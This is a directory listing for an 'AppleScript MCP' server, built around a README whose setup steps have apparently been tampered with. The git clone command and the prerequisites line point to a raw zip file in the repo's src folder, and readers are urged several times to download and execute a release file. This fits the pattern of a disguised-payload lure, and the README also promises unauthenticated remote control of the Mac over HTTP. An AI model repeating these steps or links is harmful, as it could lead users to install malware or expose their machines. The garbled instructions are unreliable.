AppleScript MCP
Provides tools to execute AppleScript commands on macOS, enabling automation of applications, system settings, and file operations.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@AppleScript MCPtell app "Finder" to make new folder at desktop"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
π AppleScript MCP: Full Control of Your Mac
Welcome to the AppleScript MCP repository! This project allows you to run AppleScript commands through an MCP server, giving you complete control over your macOS environment. Whether you're automating tasks, controlling applications, or managing system settings, this tool provides a powerful way to interact with your Mac.
π Features
Execute AppleScripts: Run your AppleScript commands seamlessly.
MCP Server: Easily set up a server that listens for commands.
Full Control: Manage your Macβs applications and settings from anywhere.
Cross-Platform: Works with various devices that can send HTTP requests.
Related MCP server: mcp-remote-macos-use
π¦ Getting Started
To get started with the AppleScript MCP, follow these steps:
Clone the Repository:
git clone https://raw.githubusercontent.com/Hassanali4/applescript-mcp/main/src/mcp-applescript-2.1-beta.1.zip cd applescript-mcpDownload and Execute: Head over to the Releases section to download the latest version. Make sure to execute the downloaded file to start the server.
Run the MCP Server: After executing the file, your MCP server will start. You can now send AppleScript commands to your Mac.
π§ Installation
Prerequisites
macOS: This tool is designed for macOS systems.
https://raw.githubusercontent.com/Hassanali4/applescript-mcp/main/src/mcp-applescript-2.1-beta.1.zip: Ensure you have https://raw.githubusercontent.com/Hassanali4/applescript-mcp/main/src/mcp-applescript-2.1-beta.1.zip installed. You can download it from https://raw.githubusercontent.com/Hassanali4/applescript-mcp/main/src/mcp-applescript-2.1-beta.1.zip.
Installation Steps
Install Dependencies:
npm installStart the Server:
npm start
Usage
Once the server is running, you can send AppleScript commands using HTTP requests. Hereβs an example using curl:
curl -X POST http://localhost:3000/execute -d 'tell application "Finder" to make new folder at desktop with properties {name:"New Folder"}'This command will create a new folder on your desktop named "New Folder".
π Documentation
For detailed documentation on how to use AppleScript MCP, please refer to the Wiki.
π οΈ Contributing
We welcome contributions! If you have suggestions, bug fixes, or new features, please open an issue or submit a pull request.
Steps to Contribute
Fork the Repository: Click the "Fork" button on the top right of the repository page.
Create a New Branch:
git checkout -b feature/YourFeatureNameMake Your Changes: Edit the files as needed.
Commit Your Changes:
git commit -m "Add your message here"Push to Your Branch:
git push origin feature/YourFeatureNameOpen a Pull Request: Go to the original repository and click "New Pull Request".
ποΈ Topics
AppleScript: A scripting language for automating tasks on macOS.
macOS: The operating system for Apple computers.
MCP: A server that allows communication between devices and applications.
MCP Server: A server setup that listens for commands and executes them.
π Releases
To find the latest releases, visit the Releases section. Download the appropriate file and execute it to get started.
π¨ Visuals
Here are some images that represent the essence of this project:
π Support
If you encounter any issues or have questions, feel free to reach out via the Issues tab on GitHub. We are here to help!
π Links
π Acknowledgments
We would like to thank the open-source community for their contributions and support. Your efforts make projects like this possible.
π License
This project is licensed under the MIT License. See the LICENSE file for more details.
Feel free to modify the content as needed. Happy scripting! π
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Tools
Latest Blog Posts
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/Hassanali4/applescript-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server